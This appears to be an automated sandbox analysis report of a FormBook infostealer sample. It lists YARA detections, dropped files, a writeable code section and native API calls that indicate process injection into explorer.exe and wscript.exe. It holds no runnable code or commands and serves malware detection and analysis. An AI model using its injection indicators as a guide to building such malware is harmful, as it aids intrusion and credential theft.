System Summary:

Detected FormBook malware

Show sources

Source: C:\Windows\SysWOW64\wscript.exe	Dropped file: C:\Users\user\AppData\Roaming\0NN3-705\0NNlogri.ini			Jump to dropped file
Source: C:\Windows\SysWOW64\wscript.exe	Dropped file: C:\Users\user\AppData\Roaming\0NN3-705\0NNlogrv.ini			Jump to dropped file

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

PE file has a writeable .text section

Show sources

Source: player-toolkit.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00029D50 NtCreateFile,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00029E00 NtReadFile,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00029E80 NtClose,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00029F30 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00029E7C NtClose,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00029F2D NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029998F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029999A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029996E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029997A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029995D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999A80 NtOpenDirectoryObject,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999A10 NtQuerySection,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0299A3B0 NtGetContextThread,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999B00 NtSetValueKey,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029998A0 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999820 NtEnumerateKey,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0299B040 NtSuspendThread,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029999D0 NtCreateProcessEx,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999950 NtQueueApcThread,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029996D0 NtCreateKey,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999610 NtEnumerateValueKey,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999650 NtQueryValueKey,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999670 NtQueryInformationProcess,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999FE0 NtCreateMutant,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0299A710 NtOpenProcessToken,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999730 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999770 NtSetInformationFile,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0299A770 NtOpenThread,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999760 NtOpenProcess,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029995F0 NtQueryInformationFile,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0299AD30 NtSetContextThread,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999520 NtWaitForSingleObject,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02999560 NtWriteFile,
Source: C:\Windows\explorer.exe	Code function: 19_2_065BFA32 NtCreateFile,NtReadFile,NtClose,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B395D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39560 NtWriteFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B396E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B396D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39610 NtEnumerateValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39770 NtSetInformationFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B399A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39B00 NtSetValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B395F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B3AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B397A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B3A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B3A770 NtOpenThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39760 NtOpenProcess,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B398A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B398F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B3B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B399D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39A20 NtResumeThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39A10 NtQuerySection,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B39A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B3A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E9D50 NtCreateFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E9E00 NtReadFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E9E80 NtClose,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E9F30 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E9E7C NtClose,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E9F2D NtAllocateVirtualMemory,

Source: C:\Users\user\Desktop\focus.exe

Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

Source: C:\Users\user\Desktop\focus.exe	Code function: 0_2_00406945
Source: C:\Users\user\Desktop\focus.exe	Code function: 0_2_0040711C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00011030
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002D986
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002E241
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002DAA6
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002D2D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002DB23
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002DCEB
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00012D87
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00012D90
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00019E2B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00019E30
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002DF20
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002CF93
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00012FB0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A222AE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A0FA2B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B236
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298138B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298EBB0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298ABD8
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A023E3
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1DBD2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A103DA
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A22B28
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029FCB4F
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297AB40
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296B090
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A220A8
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029820A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A228EC
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A2E824
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A11002
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A830
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295F900
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02974120
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A22EF7
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02976E30
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1D616
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A21FF1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A2DFCE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14496
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296841F
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1D466
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B477
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02982581
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A12D82
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296D5E0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A225DD
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A22D07
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02950D20
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A21D55
Source: C:\Windows\explorer.exe	Code function: 19_2_065BFA32
Source: C:\Windows\explorer.exe	Code function: 19_2_065B6072
Source: C:\Windows\explorer.exe	Code function: 19_2_065B6069
Source: C:\Windows\explorer.exe	Code function: 19_2_065C2A6F
Source: C:\Windows\explorer.exe	Code function: 19_2_065BE862
Source: C:\Windows\explorer.exe	Code function: 19_2_065B7CF2
Source: C:\Windows\explorer.exe	Code function: 19_2_065B7CEC
Source: C:\Windows\explorer.exe	Code function: 19_2_065BAB1F
Source: C:\Windows\explorer.exe	Code function: 19_2_065C2B0E
Source: C:\Windows\explorer.exe	Code function: 19_2_065BD132
Source: C:\Windows\explorer.exe	Code function: 19_2_065BAB22
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B0841F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BBD466
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B22581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB2D82
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B0D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC25DD
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04AF0D20
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC2D07
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC1D55
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC2EF7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B16E30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BBD616
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC1FF1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BCDFCE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B220A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC20A8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B0B090
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC28EC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1A830
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BCE824
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1002
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B199BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B14120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04AFF900
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC22AE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4AEF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B236
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BAFA2B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2EBB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2138B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BA23E3
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB03DA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BBDBD2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2ABD8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC2B28
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1A309
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1AB40
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B9CB4F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003EE241
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003D2D90
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003D2D87
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003D9E30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003D9E2B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003D2FB0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00014040
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00109056
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000C6100
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000E8140
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00109176
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00091180
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0010D1A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0003A1D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00032210
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000F2227
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00088240
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0002F250
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00023270
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000312B0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0005B400
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000F2459
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00041510
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0003A520
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000475F0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00020650
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0001A690
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0003B6D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00026740
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000C2780
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0010D800
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0010C890
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00029900
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0010691C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00041910
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000FA9E0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00059A20
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0013DA40
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0002FA70
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00031A90
